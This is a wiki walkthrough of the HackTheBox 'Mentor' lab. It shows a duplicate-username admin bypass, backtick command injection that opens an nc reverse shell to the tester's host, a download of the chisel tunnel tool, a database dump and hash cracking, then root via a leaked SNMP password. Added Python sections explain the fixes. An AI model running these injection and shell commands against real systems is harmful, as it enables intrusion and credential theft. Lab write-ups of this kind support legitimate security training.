Mentor: Difference between revisions

From RCATs
(Created page with "Category:HackTheBox Start with nmap scan with default scripts a version enumeration <source lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST Nmap scan report for 10.129.85.230 Host is up (0.085s latency)....")
 
No edit summary

Revision as of 17:29, 20 January 2023

Start with an nmap scan using the default scripts and version enumeration.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST
Nmap scan report for 10.129.85.230                                                                                                                             
Host is up (0.085s latency).                                                                                                                                   
Not shown: 998 closed tcp ports (conn-refused)                                                                                                                 
PORT   STATE SERVICE VERSION                                                                                                                                   
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)                                                                                       
| ssh-hostkey:                                                                                                                                                 
|   256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)                                                                                                               
|_  256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)                                                                                                             
80/tcp open  http    Apache httpd 2.4.52                                                                                                                       
|_http-title: Did not follow redirect to http://mentorquotes.htb/                                                                                              
|_http-server-header: Apache/2.4.52 (Ubuntu)                                                                                                                   
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                 
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds

The main web page does not have much to look at, so scan for subdomains. A vhost/subdomain scan finds api.mentorquotes.htb. Next, fuzz api.mentorquotes.htb for directories to see if anything else turns up.

 :: Method           : GET                                                                                             │
 :: URL              : http://api.mentorquotes.htb/FUZZ                                                                │
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt                     │
 :: Follow redirects : false                                                                                           │
 :: Calibration      : false                                                                                           │
 :: Timeout          : 10                                                                                              │
 :: Threads          : 40                                                                                              │
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500                                            │
________________________________________________                                                                       │
                                                                                                                       │
admin                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 98ms]                                     │
docs                    [Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 71ms]                                │
users                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 79ms]                                     │
quotes                  [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms]                                     │
server-status           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms]                                 │
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 ::

We get a status 200 from /docs, so check that out. The docs reveal a potential user, James, and various GET, POST, PUT and DELETE endpoints. Try to create a user. It works!

{
  "email": "sour@sourmilk.com",
  "username": "sourmilk",
  "password": "password123456"
}
# Response

{
  "id": 5,
  "email": "sour@sourmilk.com",
  "username": "sourmilk"
}

Create a second account with the username james, since we know he is an admin.

{
  "email": "james@sourmilk.com",
  "username": "james",
  "password": "password123456"
}

# Response

{
  "id": 6,
  "email": "james@sourmilk.com",
  "username": "james"
}

Log in at /auth/login to get a token.

{
  "email": "james@sourmilk.com",
  "username": "james",
  "password": "password123456"
}
# response
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"

curl /admin with the token to get a response.

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/

# Response
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}
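The token above is a plain HS256 JWT whose payload carries only a username and an email, and the admin check evidently keys on the username, which is why a freshly registered second "james" is granted the admin functions. The Python below is an added example, not code from the writeup or from the box: it decodes the token's claims without trusting them and contrasts a username-based authorization check with one that resolves the claims to a single account. The USERS list mirrors the users table shown later in the writeup, while ADMIN_USER_IDS and the register helper are assumptions about how such an API could be hardened.

```python
import base64
import json

# Token returned by /auth/login in the writeup (copied from the page).
TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
         "eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ."
         "bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY")

# Constructed mirror of the users table shown later in the writeup; the real
# admin is id 1 (james@mentorquotes.htb). ADMIN_USER_IDS is an assumption.
USERS = [
    {"id": 1, "email": "james@mentorquotes.htb", "username": "james"},
    {"id": 2, "email": "svc@mentorquotes.htb", "username": "service_acc"},
    {"id": 4, "email": "james@sourmilk.com", "username": "james"},
]
ADMIN_USER_IDS = {1}


def _b64url_decode(segment):
    """JWT segments are unpadded base64url; restore the '=' padding first."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token):
    """Return (header, payload) of a JWT WITHOUT checking the signature.
    This only shows what the token asserts; it must never be used to trust it."""
    header_b64, payload_b64, _signature = token.split(".")
    return (json.loads(_b64url_decode(header_b64)),
            json.loads(_b64url_decode(payload_b64)))


def is_admin_by_username(claims):
    """The weak check the box appears to use: any account that registered the
    username 'james' passes, regardless of which account it actually is."""
    return claims.get("username") == "james"


def is_admin_by_identity(claims, users=USERS):
    """Hardened check: resolve the claims to exactly one account and authorize
    on its stable id. Better still, issue the id as the 'sub' claim and never
    look an account up by username at all."""
    matches = [u for u in users
               if u["email"] == claims.get("email")
               and u["username"] == claims.get("username")]
    return len(matches) == 1 and matches[0]["id"] in ADMIN_USER_IDS


def register(users, email, username):
    """Hypothetical registration handler: refuse a username or email that is
    already taken, so a new account can never collide with a privileged one."""
    if any(u["username"] == username or u["email"] == email for u in users):
        raise ValueError("username or email already taken")
    new_user = {"id": max(u["id"] for u in users) + 1,
                "email": email, "username": username}
    users.append(new_user)
    return new_user
```

With the page's token, is_admin_by_username returns True while is_admin_by_identity returns False, because the claims resolve to id 4 rather than the real admin; the registration check closes the hole at its source by never allowing the second "james" to exist.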

Check /admin/check.

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check

# Response
{"details":"Not implemented yet!"}

Check /admin/backup/. It first answers Method Not Allowed, then complains that a body field is required:

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup

# Response
{"detail":"Method Not Allowed"}
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}

Make a test payload with a backtick command substitution in the path field to see if it gets executed. It works!

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'

Reverse shell through the same injection:

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'
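The backup endpoint evidently pastes the JSON path field into a shell command, which is why backticks inside it run commands as the API user. As an added example, not the box's real code, the Python below shows the kind of string-building that produces that behaviour beside a hardened version that validates the path and invokes the backup tool with an argv list and no shell. BACKUP_ROOT, the use of tar and the validator are assumptions about how such an endpoint would be written.

```python
import os
import re
import subprocess

# Assumed: the only directory a backup request is allowed to reference.
BACKUP_ROOT = "/app"

# Allowlist for the raw path: letters, digits, dot, underscore, dash, slash.
SAFE_PATH = re.compile(r"^[A-Za-z0-9_./-]+$")


def build_backup_command_unsafe(path):
    """Vulnerable pattern (assumed reconstruction, not the box's code): the
    user-controlled path is interpolated into one shell string. Run with
    shell=True, backticks, ';', '|' and '$(...)' in path are all interpreted."""
    return "tar -czf /tmp/backup.tgz " + path


def validate_backup_path(path, root=BACKUP_ROOT):
    """Return the resolved absolute path if it is syntactically clean and stays
    inside root, else None. Rejects shell metacharacters, '..' traversal and
    absolute paths (os.path.join discards root for those, so the containment
    check below catches them)."""
    if not SAFE_PATH.fullmatch(path) or ".." in path.split("/"):
        return None
    resolved = os.path.normpath(os.path.join(root, path))
    if resolved != root and not resolved.startswith(root + "/"):
        return None
    return resolved


def build_backup_argv(path):
    """Hardened form: each argument is its own argv element and no shell is
    involved, so the path can only ever be a path. The '--' is defensive, in
    case a later change passes a relative path that starts with '-'."""
    resolved = validate_backup_path(path)
    if resolved is None:
        raise ValueError("rejected backup path")
    return ["tar", "-czf", "/tmp/backup.tgz", "--", resolved]


def run_backup(path):
    """Execute the hardened command; shell=False is the default but spelled out."""
    return subprocess.run(build_backup_argv(path), shell=False, check=True)
```

The validator and the argv form are independent defences: even if the allowlist were loosened, nothing in the argv version ever reaches a shell parser, and even if a shell were unavoidable, the allowlist leaves nothing for it to interpret.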

Dig around the Docker container you land in.

/app # ls
Dockerfile
app
requirements.txt
/app # ls -al
total 32
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 .
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 ..
-rw-r--r--    1 root     root          1024 Jun 12 10:21 .Dockerfile.swp
-rw-r--r--    1 root     root           522 Nov  3 12:58 Dockerfile
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 app
-rw-r--r--    1 root     root           672 Jun  4  2022 requirements.txt
/app # cd app
/app/app # ls -al
total 40
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 .
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 ..
-rw-r--r--    1 root     root             0 Jun  4  2022 __init__.py
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 __pycache__
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 api
-rw-r--r--    1 root     root             0 Jun  4  2022 config.py
-rw-r--r--    1 root     root          1001 Jun  7  2022 db.py
-rw-r--r--    1 root     root          1149 Jun  4  2022 main.py
-rw-r--r--    1 root     root           704 Jun  4  2022 requirements.txt

cat db.py

import os

from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database

# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

# SQLAlchemy for quotes
engine = create_engine(DATABASE_URL)
metadata = MetaData()
quotes = Table(
    "quotes",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("title", String(50)),
    Column("description", String(50)),
    Column("created_date", DateTime, default=func.now(), nullable=False)
)

# SQLAlchemy for users
engine = create_engine(DATABASE_URL)
metadata = MetaData()
users = Table(
    "users",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("email", String(50)),
    Column("username", String(50)),
    Column("password", String(128) ,nullable=False)
)


# Databases query builder
database = Database(DATABASE_URL)

db.py points at a PostgreSQL server on 172.22.0.1, the Docker bridge, so forward that port back to my machine with chisel. Useful reading: Hacktricks on tunneling and port forwarding (https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding) and a good introduction to chisel in CTFs (https://dev.to/jmau111/getting-started-with-chisel-in-ctfs-o76).

# My machine
./chisel server -p 4443 --reverse

# Victim machine
wget http://10.10.16.11/chisel
chmod +x chisel
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432

Now we can try to log into the database we found, through the forwarded port.

psql -h 127.0.0.1 -U "postgres" -p 5432
Password for user postgres:
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
Type "help" for help.

postgres=# \list
                                    List of databases
      Name       |  Owner   | Encoding |  Collate   |   Ctype    |   Access privileges   
-----------------+----------+----------+------------+------------+-----------------------
 mentorquotes_db | postgres | UTF8     | en_US.utf8 | en_US.utf8 |
 postgres        | postgres | UTF8     | en_US.utf8 | en_US.utf8 |
 template0       | postgres | UTF8     | en_US.utf8 | en_US.utf8 | =c/postgres          +
                 |          |          |            |            | postgres=CTc/postgres
 template1       | postgres | UTF8     | en_US.utf8 | en_US.utf8 | =c/postgres          +
                 |          |          |            |            | postgres=CTc/postgres
(4 rows)

postgres=# \c mentorquotes_db
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
You are now connected to database "mentorquotes_db" as user "postgres".
mentorquotes_db=# \d
              List of relations
 Schema |     Name      |   Type   |  Owner   
--------+---------------+----------+----------
 public | cmd_exec      | table    | postgres
 public | quotes        | table    | postgres
 public | quotes_id_seq | sequence | postgres
 public | users         | table    | postgres
 public | users_id_seq  | sequence | postgres
(5 rows)

mentorquotes_db=# select * from users;
 id |          email          |  username   |             password             
----+-------------------------+-------------+----------------------------------
  1 | james@mentorquotes.htb  | james       | -----------------------------
  2 | svc@mentorquotes.htb    | service_acc | --------------------------
  4 | james@sourmilk.com      | james       | -------------------
(3 rows)

Grab the svc hash; CrackStation has a hit!

123meuno***********

SSH into the box as svc.

❯ ssh svc@mentorquotes.htb
svc@mentorquotes.htb's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Dec 12 05:21:51 PM UTC 2022

  System load:                      0.08740234375
  Usage of /:                       64.9% of 8.09GB
  Memory usage:                     14%
  Swap usage:                       0%
  Processes:                        237
  Users logged in:                  0
  IPv4 address for br-028c7a43f929: 172.20.0.1
  IPv4 address for br-24ddaa1f3b47: 172.19.0.1
  IPv4 address for br-3d63c18e314d: 172.21.0.1
  IPv4 address for br-7d5c72654da7: 172.22.0.1
  IPv4 address for br-a8a89c3bf6ff: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.85.242
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:4e9f


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11
svc@mentor:~$

Search for passwords in config files with grep -iR password /etc 2>/dev/null | grep ".conf"

svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf"
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/ssh/ssh_config:#   PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitRootLogin prohibit-password
/etc/ssh/sshd_config:# To disable tunneled clear text passwords, change to no here!
/etc/ssh/sshd_config:#PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitEmptyPasswords no
/etc/ssh/sshd_config:# Change to yes to enable challenge-response passwords (beware issues with
/etc/ssh/sshd_config:# PasswordAuthentication.  Depending on your PAM configuration,
/etc/ssh/sshd_config:# the setting of "PermitRootLogin without-password".
/etc/ssh/sshd_config:# PAM authentication, then enable this but set PasswordAuthentication
/etc/ssh/sshd_config:PasswordAuthentication yes
/etc/apache2/sites-available/default-ssl.conf:          #        Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf:          #        file needs this password: `xxj31ZMTZzkVA'.
/etc/sos/sos.conf:#password = true
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
/etc/overlayroot.conf:#       if not provided or empty, password is randomly generated
/etc/overlayroot.conf:#       the generated password will be stored for recovery in
/etc/overlayroot.conf:#     crypt:dev=/dev/vdb,pass=somepassword,mkfs=0
/etc/overlayroot.conf:#      $ MAPNAME="secure"; DEV="/dev/vdg"; PASSWORD="foobar"
/etc/overlayroot.conf:#      $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:#      $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:#    IT IS INSECURE TO SET THIS PASSWORD HERE IN THIS CLEARTEXT CONFIGURATION
/etc/overlayroot.conf:#    Randomly generated passwords are more secure, but you won't be able to
/etc/overlayroot.conf:#    Randomly generated passwords are generated by calculating the sha512sum
/etc/fwupd/remotes.d/lvfs-testing.conf:#Password=
/etc/fwupd/redfish.conf:# The username and password to the Redfish service
/etc/fwupd/redfish.conf:#Password=
/etc/sudo.conf:# password prompt for "sudo -A" support.  Sudo does not ship with its
/etc/apparmor.d/abstractions/authentication:  # databases containing passwords, PAM configuration files, PAM libraries

Winner Winner

/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
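Most of the grep output above is commented-out documentation; the one live hit is the uncommented createUser line in snmpd.conf. As an added example that is not part of the writeup, the Python below performs the same credential sweep a defender would run during a configuration audit but keeps only active, non-comment lines, so the real directive is not buried in noise. The sample tree it builds is constructed for the example, with a placeholder passphrase in place of the real one.

```python
import os
import re
import tempfile

# Keywords worth a look in configuration files; tune for the environment.
CREDENTIAL_RE = re.compile(r"pass(word|phrase)?|secret|createUser", re.IGNORECASE)
# A line whose first non-blank character is '#' is documentation, not config.
COMMENT_RE = re.compile(r"^\s*#")


def live_credential_lines(root):
    """Return sorted (relative_path, line) pairs for every non-comment line
    under root that mentions a credential keyword. Unreadable files are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    for raw in fh:
                        line = raw.rstrip("\n")
                        if CREDENTIAL_RE.search(line) and not COMMENT_RE.match(line):
                            hits.append((os.path.relpath(full, root), line))
            except OSError:
                continue
    return sorted(hits)


def make_sample_etc():
    """Constructed sample tree mimicking the writeup's grep output: commented
    documentation in hdparm.conf, an active sshd directive, and one active
    SNMP createUser line with a placeholder passphrase."""
    root = tempfile.mkdtemp(prefix="etc_audit_")
    files = {
        "hdparm.conf": "# --security-set-pass Set security password\n"
                       "# security_pass = password\n",
        "ssh/sshd_config": "#PasswordAuthentication yes\n"
                           "PasswordAuthentication yes\n",
        "snmp/snmpd.conf": "# createUser <name> MD5 <passphrase> DES\n"
                           "createUser bootstrap MD5 EXAMPLE_PASSPHRASE DES\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root
```

Run live_credential_lines("/etc") on a real host to get the two-line view instead of the fifty-line one; the sshd hit shows that keyword matches still need a human to decide whether a line is a setting or an actual secret.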

su to james with that password, sudo to root, and get your flag!

james@mentor:/tmp$ su james
Password:
james@mentor:/tmp$ sudo /bin/sh
[sudo] password for james:
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
logins.log  root.txt  scripts  snap
# cat root.txt